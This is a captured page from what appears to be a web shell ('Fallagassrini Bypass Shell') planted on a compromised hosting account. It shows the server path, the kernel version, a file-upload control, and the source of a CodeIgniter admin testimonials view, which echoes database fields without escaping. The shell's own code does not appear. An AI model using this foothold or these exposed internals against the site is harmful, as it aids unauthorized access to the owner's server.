? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/unova.in/application/views/admin/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/unova.in/application/views/admin/testimonial.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<?php
$this->load->view('admin/header');
?>
    <body>
	<?php
            $this->load->view('admin/menu');
        ?>

		<div class="container_12">

                <div class="addnew">
                    <a href="<?=site_url();?>/admin/add_testimonial" class="button"><span>Add New</span></a>
                    </div>

         <!-- Example table -->
                <div class="module">
                	<h2><span>Testimonials</span></h2>

                    <div class="module-table-body">
                    	<form action="">
                        <table id="myTable" class="tablesorter">
                        	<thead>
                                <tr>
                                    <th style="width:5%">Sl No</th>
                                    <th style="width:15%">Person</th>
                                    <th style="width:20%">Designation</th>
                                    <th style="width:45%">Testimonial</th>
                                    <th style="width:5%">Sort</th>
                                    <th style="width:10%">Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                             <?php
                                    $i=$id;
                                    if ($testimonials->num_rows() > 0)
                             {
                                 foreach ($testimonials->result_array() as $testimonial)
                                 {
                             ?>
                                <tr>
                                    <td class="align-center"><?=$i++;?></td>
                                   
                                    <td><?=$testimonial['person'];?></td>
                                    <td><?=$testimonial['designation'];?></td>
                                    <td><?=$testimonial['testimonial'];?></td>
                                    <td><?=$testimonial['sort'];?></td>
                                    <td>
                                         <a href="<?=site_url();?>/admin/update-testimonial/<?=$testimonial['id'];?>"><img src="<?=base_url();?>/assets/admin/images/pencil.gif" width="16" height="16" alt="edit" title="Edit" /></a>
                                        <?=anchor("admin/delete/testimonial/id/".$testimonial['id']."/testimonial", '<img src="'.base_url().'assets/admin/images/bin.gif"  title="Delete" width="16" height="16" align = "center" >',array('onclick'=>"return confirm('Are you sure want to delete this record?')"))?>

                                    </td>
                                </tr>
                              <?php
                                    }
                             }
                              ?>
                            </tbody>
                        </table>
                        </form>
                        <div id="pager">
                         <ul id="pagination-digg">

                             <li <?php if($pagenum>1){ ?>class="previous" <?php } else { ?> class="previous-off" <?php } ?> >
                             <?php if($pagenum>1){ ?><a href="<?=site_url();?>/admin/testimonial/<?=$pagenum-1?>"  > <?php } ?>


                            «Previous</a></li>
                            <?php

    //Pagination Numbers

                            for($i=$startpage; $i<=$endpage; $i++)
                            {

                             if($pagenum==$i )
                               {
                               ?>

                              <li class="active" ><?=$i?></li>
                               <?php

                               }
                              else
                               {
                               ?>

                              <li  ><a href="<?=site_url();?>/admin/testimonial/<?=$i?>"><?=$i?></a></li>
                               <?php

                               }


                            }
                        ?>
                        <li <?php if($pagenum<$endpage){ ?>  class="next-on" <?php } else { ?> class="next-off" <?php } ?>>
                            <?php if($pagenum<$endpage){ ?><a href="<?=site_url();?>/admin/testimonial/<?=$pagenum+1?>" > <?php } ?> Next » </a></li>


                        </ul>
                    </div>


                    

                        <div style="clear: both"></div>
                     </div> <!-- End .module-table-body -->
                </div> <!-- End .module -->


                     
            <div style="clear:both;"></div>


            </div> <!-- End .container_12 -->


<?php
$this->load->view('admin/footer');
?>

	</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net